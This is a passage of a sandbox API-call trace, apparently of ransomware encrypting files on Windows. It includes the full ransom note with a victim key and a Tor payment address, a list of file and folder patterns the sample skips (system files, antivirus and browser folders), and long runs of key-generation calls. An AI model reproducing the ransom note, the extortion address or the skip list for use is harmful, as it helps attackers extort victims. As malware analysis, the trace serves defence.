_File=0x77ac1228) returned 0 [0156.459] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0156.459] CryptDestroyKey (hKey=0x9ad3b8) returned 1 [0156.459] CryptDestroyHash (hHash=0x9ad1f8) returned 1 [0156.459] CryptReleaseContext (hProv=0x8e3aa0, dwFlags=0x0) returned 1 [0156.459] FindNextFileW (in: hFindFile=0x9ad1b8, lpFindFileData=0x2d7dedc | out: lpFindFileData=0x2d7dedc) returned 0 [0156.459] GetLastError () returned 0x12 [0156.459] FindClose (in: hFindFile=0x9ad1b8 | out: hFindFile=0x9ad1b8) returned 1 [0156.459] _wfopen (_FileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\Recovers your files.html" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\insert\\recovers your files.html"), _Mode="w") returned 0x77ac1268 [0156.460] fputs (in: _Str=" Encrypted files!

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a

Encrypted files!

All your files are encrypted.Using AES256-bit encryption and RSA-2048-bit encryption.
Making it impossible to recover files without the correct private key.
If you are interested in getting is the key and recover your files
You should proceed with the following steps.

The only way to decrypt your files safely is to buy the Descrypt and Private Key software.

Any attempts to restore your files with the third-party software will be fatal for your files!

Important use Firefox or Chrome browser

To proceed with the purchase you must access one of the link below

If neither of the links is online for a long period of time, there is another way to open it, you should install the Tor Browser

If your personal page is not available for a long period there is another way to open your personal page - installation and use of Tor Browser:

  1. run your Internet browser (if you do not know what it is run the Internet Explorer);
  2. enter or copy the address https://www.torproject.org/download/download-easy.html.en into the address bar of your browser and press ENTER;
  3. wait for the site loading;
  4. on the site you will be offered to download Tor Browser; download and run it, follow the installation instructions, wait until the installation is completed;
  5. run Tor Browser;
  6. connect with the button 'Connect' (if you use the English version);
  7. a normal Internet browser window will be opened after the initialization;
  8. type or copy the address

    https://lylh3uqyzay3lhrd.onion

    in this browser address bar;
  9. press ENTER;
  10. the site should be loaded; if for some reason the site is not loading wait for a moment and try again.
If you have any problems during installation or use of Tor Browser, please, visit https://www.youtube.com and type request in the search bar 'Install Tor Browser Windows' and you will find a lot of training videos about Tor Browser installation and use.

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a
", _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0156.460] fclose (in: _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0156.461] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0156.461] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0156.461] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0156.461] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0156.461] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0156.461] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0156.461] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\*", pszSpec="*.exe") returned 0 [0156.461] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\*", pszSpec="*.dll") returned 0 [0156.461] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\*", pszSpec="*.lnk") returned 0 [0156.461] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\*", pszSpec="*.bat") returned 0 [0156.461] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\*", pszSpec="*.ini") returned 0 [0156.461] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\*", pszSpec="*.msi") returned 0 [0156.461] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\*", pszSpec="*.scf") returned 0 [0156.461] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\*", pszSpec="*pagefile.sys*") returned 0 [0156.461] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\*", pszSpec="*NTUSER.DAT*") returned 0 [0156.461] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\*", pszSpec="*AppData*") returned 0 [0156.461] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\*", pszSpec="*\\winrar\\*") returned 0 [0156.461] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0156.461] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\*", pszSpec="*\\java\\*") returned 0 [0156.461] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0156.461] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\*", pszSpec="*\\windows\\*") returned 0 [0156.461] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\*", pszSpec="*\\ESET\\*") returned 0 [0156.461] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\*", pszSpec="*\\AVG\\*") returned 0 [0156.461] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\*", pszSpec="*\\AVIRA\\*") returned 0 [0156.461] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0156.461] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\*", pszSpec="*Atheros*") returned 0 [0156.461] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\*", pszSpec="*Realtek*") returned 0 [0156.461] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\*", pszSpec="*bootmgr*") returned 0 [0156.461] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\*", pszSpec="*boot*") returned 0 [0156.461] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\*", pszSpec="*boot*") returned 0 [0156.461] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\*", pszSpec="*CONFIG.SYS*") returned 0 [0156.461] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\*", pszSpec="*IO.SYS*") returned 0 [0156.461] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\*", pszSpec="*MSDOS.SYS*") returned 0 [0156.462] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\*", pszSpec="*NTDETECT.COM*") returned 0 [0156.462] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\*", pszSpec="*ntldr*") returned 0 [0156.462] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\*", pszSpec="*chrome*") returned 0 [0156.462] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\*", pszSpec="*opera*") returned 0 [0156.462] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\*", pszSpec="*firefox*") returned 0 [0156.462] wcslen (_String="\\\\?\\") returned 0x4 [0156.462] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\*", lpFindFileData=0x2d7dedc | out: lpFindFileData=0x2d7dedc) returned 0x9ad238 [0156.462] wcscmp (_String1=".", _String2=".") returned 0 [0156.462] FindNextFileW (in: hFindFile=0x9ad238, lpFindFileData=0x2d7dedc | out: lpFindFileData=0x2d7dedc) returned 1 [0156.462] wcscmp (_String1="..", _String2=".") returned 1 [0156.462] wcscmp (_String1="..", _String2="..") returned 0 [0156.462] FindNextFileW (in: hFindFile=0x9ad238, lpFindFileData=0x2d7dedc | out: lpFindFileData=0x2d7dedc) returned 1 [0156.462] PathMatchSpecW (pszFile="ea.xml", pszSpec="*NMCRYPT") returned 0 [0156.462] PathMatchSpecW (pszFile="ea.xml", pszSpec="*Recovers your files.html") returned 0 [0156.462] PathMatchSpecW (pszFile="ea.xml", pszSpec="*.exe") returned 0 [0156.462] PathMatchSpecW (pszFile="ea.xml", pszSpec="*.dll") returned 0 [0156.462] PathMatchSpecW (pszFile="ea.xml", pszSpec="*.lnk") returned 0 [0156.462] PathMatchSpecW (pszFile="ea.xml", pszSpec="*.bat") returned 0 [0156.462] PathMatchSpecW (pszFile="ea.xml", pszSpec="*.ini") returned 0 [0156.462] PathMatchSpecW (pszFile="ea.xml", pszSpec="*.msi") returned 0 [0156.462] PathMatchSpecW (pszFile="ea.xml", pszSpec="*.scf") returned 0 [0156.462] PathMatchSpecW (pszFile="ea.xml", pszSpec="*pagefile.sys*") returned 0 [0156.462] PathMatchSpecW (pszFile="ea.xml", pszSpec="*NTUSER.DAT*") returned 0 [0156.462] PathMatchSpecW (pszFile="ea.xml", pszSpec="*AppData*") returned 0 [0156.462] PathMatchSpecW (pszFile="ea.xml", pszSpec="*\\winrar\\*") returned 0 [0156.462] PathMatchSpecW (pszFile="ea.xml", pszSpec="*\\Internet Explorer\\*") returned 0 [0156.462] PathMatchSpecW (pszFile="ea.xml", pszSpec="*\\java\\*") returned 0 [0156.462] PathMatchSpecW (pszFile="ea.xml", pszSpec="*\\TeamViewer\\*") returned 0 [0156.462] PathMatchSpecW (pszFile="ea.xml", pszSpec="*\\windows\\*") returned 0 [0156.462] PathMatchSpecW (pszFile="ea.xml", pszSpec="*\\ESET\\*") returned 0 [0156.462] PathMatchSpecW (pszFile="ea.xml", pszSpec="*\\AVG\\*") returned 0 [0156.462] PathMatchSpecW (pszFile="ea.xml", pszSpec="*\\AVIRA\\*") returned 0 [0156.462] PathMatchSpecW (pszFile="ea.xml", pszSpec="*\\AVAST Software\\*") returned 0 [0156.462] PathMatchSpecW (pszFile="ea.xml", pszSpec="*Atheros*") returned 0 [0156.462] PathMatchSpecW (pszFile="ea.xml", pszSpec="*Realtek*") returned 0 [0156.462] PathMatchSpecW (pszFile="ea.xml", pszSpec="*bootmgr*") returned 0 [0156.462] PathMatchSpecW (pszFile="ea.xml", pszSpec="*boot*") returned 0 [0156.462] PathMatchSpecW (pszFile="ea.xml", pszSpec="*boot*") returned 0 [0156.462] PathMatchSpecW (pszFile="ea.xml", pszSpec="*CONFIG.SYS*") returned 0 [0156.462] PathMatchSpecW (pszFile="ea.xml", pszSpec="*IO.SYS*") returned 0 [0156.462] PathMatchSpecW (pszFile="ea.xml", pszSpec="*MSDOS.SYS*") returned 0 [0156.463] PathMatchSpecW (pszFile="ea.xml", pszSpec="*NTDETECT.COM*") returned 0 [0156.463] PathMatchSpecW (pszFile="ea.xml", pszSpec="*ntldr*") returned 0 [0156.463] PathMatchSpecW (pszFile="ea.xml", pszSpec="*chrome*") returned 0 [0156.463] PathMatchSpecW (pszFile="ea.xml", pszSpec="*opera*") returned 0 [0156.463] PathMatchSpecW (pszFile="ea.xml", pszSpec="*firefox*") returned 0 [0156.463] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml", pszSpec="*") returned 1 [0156.463] strlen (_Str="NMoreira") returned 0x8 [0156.463] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.463] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.463] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.463] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.463] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.463] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.463] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.463] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.463] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.463] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.463] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.463] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.463] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.463] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.463] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.463] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.463] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.463] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.463] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.463] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.463] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.463] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.463] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.463] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.463] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.463] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.463] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.463] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.463] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.463] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.463] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.463] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.463] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.463] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.463] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.463] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.463] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.463] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.463] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.463] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: 